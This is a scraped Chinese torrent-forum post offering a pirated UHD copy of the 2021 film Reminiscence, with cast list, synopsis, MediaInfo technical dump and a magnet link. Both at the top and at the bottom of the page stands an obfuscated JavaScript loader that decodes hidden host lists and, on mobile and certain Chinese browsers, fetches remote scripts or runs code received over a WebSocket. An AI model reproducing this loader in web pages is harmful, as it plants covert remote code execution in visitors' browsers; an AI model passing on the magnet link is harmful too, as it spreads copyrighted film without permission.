追忆迷局[简体字幕].Reminiscence.2021.UHD.2160p.x265.10bit.HDR.mUHD 15.55GB

版主小s 24天前 232

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 追忆迷局 / 追忆 / 回忆 / 追忆人(台) / 回忆潜行(港)

◎片 名 Reminiscence

◎年 代 2021

◎产 地 美国

◎类 别 爱情 / 科幻 / 悬疑 / 惊悚

◎语 言 英语

◎上映日期 2021-08-20(美国)

◎IMDb链接 https://www.imdb.com/title/tt3272066/

◎豆瓣评分 6.1/10 (9911人评价)

◎豆瓣链接 https://movie.douban.com/subject/26615748/

◎片 长 116分钟

◎导 演 丽莎·乔伊 Lisa Joy (id:1362816)

◎编 剧 丽莎·乔伊 Lisa Joy (id:1362816)

◎演 员 休·杰克曼 Hugh Jackman (id:1010508)

丽贝卡·弗格森 Rebecca Ferguson (id:1088314)

坦迪·牛顿 Thandiwe Newton (id:1040513)

克利夫·柯蒂斯 Cliff Curtis (id:1022578)

玛丽娜·德·塔维拉 Marina de Tavira (id:1282087)

吴彦祖 Daniel Wu (id:1027502)

莫让·阿里亚 Mojean Aria (id:1461029)

布莱特·卡伦 Brett Cullen (id:1049693)

娜塔丽·马丁内斯 Natalie Martinez (id:1009324)

安吉拉·萨拉弗安 Angela Sarafyan (id:1213058)

山姆麦地那 Sam Medina (id:1336516)

朴云龙 Woon Young Park (id:1127857)

韩·索托 Han Soto (id:1446014)

雷·埃尔南德斯 Rey Hernandez (id:1323494)

安德鲁·马希特 Andrew Masset (id:1118328)

妮可·帕克 Nico Parker (id:1405391)

朱尔斯·哈特利 Jules Hartley (id:1429938)

伊万·姆巴科普 Ivan Mbakop (id:1445883)

杰夫·布洛克顿 Jeff Brockton (id:1076843)

迈克尔·帕帕约翰 Michael Papajohn (id:1040856)

Laci Broussard Laci Broussard (id:1454766)

肖恩·卡特·彼得森 Shawn Carter Peterson (id:1386174)

托马斯·弗兰西斯·墨菲 Thomas Francis Murphy (id:1383086)

让·克劳德·卢耶 Jean Claude Leuyer (id:1254641)

特瑞·韦伯 Teri Wyble (id:1339892)

奥图姆·戴尔 Autumn Dial (id:1357563)

迈尔斯·哈姆帕斯 Myles Humphus (id:1371369)

戈登·德克海默 Gordon Dexheimer (id:1240166)

蒂莫西·辛里奇斯 Timothy Hinrichs (id:1432831)

道恩·林恩 Dawn Lyn (id:1272931)

托尼·查普曼·斯蒂尔 Toney Chapman Steele (id:1432828)

哈维尔·莫利纳 Javier Molina (id:1461041)

诺里奥·西村 Norio Nishimura (id:1461042)

丽莎·乔伊 Lisa Joy (id:1362816)

乔纳森·诺兰 Jonathan Nolan (id:1275104)

迈克·德·鲁卡 Michael De Luca (id:1314002)

亚伦·莱德 Aaron Ryder (id:1369601)

◎标 签 科幻 / 悬疑 / 爱情 / 美国 / 2021 / 犯罪 / 剧情 / 动作

◎简 介

尼克·班尼斯特(休·杰克曼 饰)是一名私家侦探。他的工作主要是帮助客户重拾遗忘的记忆,沉湎于幽暗诱人的逝去时光。尼克生活在因海平面上升而已经半淹没的迈阿密,然而当他接手了新客户梅(丽贝卡·弗格森 饰)之后,他的生活永远改变了。一次简单的寻回失物之任务,演变成一出危机重重的惊天迷局。尼克努力寻找着梅的失踪真相,而与整座城市存亡息息相关的巨型阴谋也逐渐浮现。他必须争分夺秒,破解回忆迷局,但他真的能在阴谋将自己吞噬前,找到梅失踪的真相吗?同时尼克也必须直面一个终极难题:为了留住你最爱的人,你到底愿意付出什么?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 242785512145812386442100097227604093306 (0xB6A6C9EE2C9DA15D3AC213F2B23FE97A)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 15.5 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 19.2 Mb/s

  11. Encoded date : UTC 2021-11-07 02:51:44

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 55 min

  22. Bit rate : 16.0 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 604 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.108

  32. Stream size : 13.0 GiB (83%)

  33. Writing library : x265 3.3+3-g8f8e332f1+29:[Windows][#Erg`Djh#][@Yuuki] made by @Dongfangbubai

  34. Encoding settings : rc=crf / crf=18.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=-3 / crqpoffs=-3 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=3.00 / deblock=-1:-1 / ref=5 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=23 / max-keyint=240 / rc-lookahead=60 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=4 / merange=25 / rdoq-level=2 / rd=4 / rdpenalty=1 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=2 / tu-intra-depth=2 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541176575 / frame-threads=6 / numa-pools=54,- / log-level=2 / input-csp=1 / input-res=3840x1604 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / no-aud / hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=0 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=1216,98 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ=

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  43. Maximum Content Light Level : 1216 cd/m2

  44. Maximum Frame-Average Light Level : 98 cd/m2


  45. Audio

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 55 min

  52. Bit rate mode : Variable

  53. Bit rate : 3 062 kb/s

  54. Maximum bit rate : 4 716 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 2.48 GiB (16%)

  61. Title : 英语

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 47 min

  75. Bit rate : 32.6 kb/s

  76. Count of elements : 2870

  77. Stream size : 25.0 MiB (0%)

  78. Title : 英文

  79. Language : English

  80. Default : Yes

  81. Forced : No


  82. Text #2

  83. ID : 4

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 54 min

  89. Bit rate : 28.6 kb/s

  90. Count of elements : 2946

  91. Stream size : 23.5 MiB (0%)

  92. Title : 官方简中

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #3

  97. ID : 5

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 48 min

  103. Bit rate : 45.0 kb/s

  104. Count of elements : 2637

  105. Stream size : 34.8 MiB (0%)

  106. Title : 简英双语

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Menu

  111. 00:00:00.000 : en:第 01 章

  112. 00:09:31.446 : en:第 02 章

  113. 00:16:54.055 : en:第 03 章

  114. 00:25:04.712 : en:第 04 章

  115. 00:34:40.704 : en:第 05 章

  116. 00:42:31.299 : en:第 06 章

  117. 00:51:19.201 : en:第 07 章

  118. 01:00:36.800 : en:第 08 章

  119. 01:09:12.815 : en:第 09 章

  120. 01:18:36.837 : en:第 10 章

  121. 01:28:21.713 : en:第 11 章

  122. 01:38:00.041 : en:第 12 章

  123. 01:41:52.106 : en:第 13 章

  124. 01:49:30.355 : en:第 14 章




复制代码


TAGS 惊悚 悬疑 科幻 爱情

磁力链:
  • magnet:?xt=urn:btih:9DE2DC629851948A1B5B96292AC1CA2943C6962B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};